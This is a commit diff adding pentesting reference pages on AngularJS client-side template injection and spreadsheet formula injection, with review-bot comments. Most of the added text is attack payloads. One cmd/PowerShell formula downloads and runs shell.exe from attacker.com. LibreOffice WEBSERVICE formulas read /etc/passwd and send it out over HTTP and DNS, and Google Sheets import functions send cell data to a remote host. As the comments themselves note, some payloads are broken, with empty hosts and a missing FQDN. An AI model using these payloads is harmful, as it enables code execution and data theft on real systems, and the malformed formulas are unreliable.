GitBook: [master] 2 pages modified
carlospolop authored and gitbook-bot committed Jun 29, 2021
1 parent 45f8827 commit bc72708
Showing 2 changed files with 73 additions and 0 deletions.
5 changes: 5 additions & 0 deletions pentesting-web/client-side-template-injection-csti.md
Expand Up @@ -16,13 +16,18 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)
{% hint style="danger" %}
\*\*\*\*[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
{% endhint %}
### VueJS
You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)
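Review bot: the hint block added in this hunk opens with `\*\*\*\*`, four escaped asterisks that render as literal asterisks in front of the link; drop them. The link target also carries a long `#:~:text=...` text-fragment suffix that adds nothing to the reference and is easy to mangle in Markdown, so the bare post URL `http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html` is enough. Also, the section heading and surrounding text say "AngularJS" while the hint says "Angular 1.6"; writing "AngularJS 1.6" avoids confusion with Angular 2+, which has no expression sandbox history at all.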
68 changes: 68 additions & 0 deletions pentesting-web/formula-injection.md
Expand Up @@ -43,3 +43,71 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca

![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%281%29.png)

### More

```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```

## LFI

#### LibreOffice Calc

* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`

**Analyzing the DNS ex-filtration payload:**

* ‘file:///etc/passwd’\#$passwd.A19 – Will read the 19th line from the local /etc/passwd file
* ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\) – URL encode the returned data
* MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\) – Similar to substring, read data from 1st character to 41st – a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\) – replace all instances of % \(the special character from URL encoding\) with dash – this is ensure that only valid DNS characters are used
* CONCATENATE\(\(SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\)\),”.&lt;FQDN&gt;\) – Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* WEBSERVICE – Will make a request for this non-existent DNS name which we can then parse the logs \(or run tcpdump etc.\) on the DNS authoritative name server for which we have control

## Google Sheets OOB Data Exfiltration

Firstly, let’s introduce some of the more interesting functions.

**CONCATENATE**: Appends strings to one another.

```text
=CONCATENATE(A2:E2)
```

**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.

```text
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```

**IMPORTFEED**: Imports a RSS or ATOM feed.

```text
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```

**IMPORTHTML**: Imports data from a table or list within an HTML page.

```text
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```

**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.

```text
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```

**IMAGE**: Inserts an image into a cell.

```text
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```

## References

{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}
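Review bot: the two WEBSERVICE payloads under LibreOffice Calc have an empty host (`http://:8080/`), so as written they point nowhere; the host placeholder that the later Google Sheets examples use (`[remote IP:Port]`) was evidently lost and should be restored in the same placeholder form. The DNS payload above "Analyzing the DNS ex-filtration payload" ends with `"."))` and never appends the `<FQDN>` that the CONCATENATE step of the walkthrough describes, so payload and explanation disagree; that walkthrough line also contains raw `&lt;FQDN&gt;` entities and curly quotes (‘ ’ “ ”) in text that is meant to be formula, which will not paste into a cell as-is. Smaller points: "this is ensure" should read "this is to ensure"; the fence under `### More` is tagged `bash` for a spreadsheet formula while the later blocks use `text`; `## LFI` is followed directly by a `####` heading, skipping a level; and `=IMPORTHTML (` has a stray space before the parenthesis.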
